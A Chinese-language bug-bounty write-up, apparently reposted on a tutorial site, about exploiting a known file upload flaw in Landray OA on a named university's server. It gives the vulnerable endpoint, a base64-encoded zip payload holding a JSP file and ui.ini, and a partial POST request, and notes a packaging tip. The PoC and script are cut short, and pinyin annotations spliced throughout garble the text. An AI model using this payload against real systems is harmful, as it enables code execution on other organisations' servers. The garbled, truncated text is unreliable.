藍凌OA漏洞SRC實戰(zhàn):指紋識別->代碼執(zhí)行
當(dāng)前位置:點晴教程→知識管理交流
→『 技術(shù)文檔交流 』
一.發(fā)現(xiàn)目標今天不小心滲透測試其它目標時點進了北京外國語大學(xué)的一個oa登陸界面 看著有點眼熟,于是去識別了一下指紋
藍凌OA,老熟人,于是我們用一下歷史漏洞打一下這個站 二.漏洞驗證驗證漏洞是否可以利用,可以訪問該接口 https://127.0.0.1/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload
頁面如下 成功訪問 有戲,那我們接著利用一下 三.漏洞利用構(gòu)造上傳文件,guyue.jsp和ui.ini,然后放在同一個文件夾下打包
然后將壓縮包進行base64編碼 UEsDBBQAAAAIAFh3PVjyEgrVagAAAHQAAAAJAAAAZ3V5dWUuanNwHchBCsIwEAXQveAdYqGQgOQCFZeuRU8wlE8z7TCJcVLx9qV9y3frXW4WS2U1Ud8liORronFBdVP7N8xMuuDShUHxO59mWilyjg8WeCpFeCTjrHGCvUDyJEu+4tPwtf3eqKvAjg4hDK6/b1BLAwQKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAAAHVpLmluaWlkPWd1eXVlDQpuYW1lPWd1eXVlDQp0aHVtYj1ndXl1ZVBLAQI/ABQAAAAIAFh3PVjyEgrVagAAAHQAAAAJACQAAAAAAAAAIAAAAAAAAABndXl1ZS5qc3AKACAAAAAAAAEAGACFTpyagFLaAVLdOrSAUtoBHYjQR31S2gFQSwECPwAKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAkAAAAAAAAACAAAACRAAAAdWkuaW5pCgAgAAAAAAABABgADo27rYBS2gFZ3ATDgFLaARn/z0d9UtoBUEsFBgAAAAACAAIAswAAANYAAAAAAA== poc如下 POST /api///sys/ui/sys_ui_extend/sysUiExtend.do?method=getThemeInfo HTTP/1.1 附上編碼腳本 import base64 這里我踩了半個多小時的坑,需要直接將兩個文件進行壓縮,而不是先壓縮成文件夾,再進行壓縮 成功訪問到我寫入的文件路徑
四.提交src教育src點到為止,不要上傳馬(bushi)
來源:https://mp.weixin.qq.com/s/DorHJncR89z9XvyTwalnFA 該文章在 2024/8/16 15:04:23 編輯過 |
關(guān)鍵字查詢
相關(guān)文章
正在查詢... |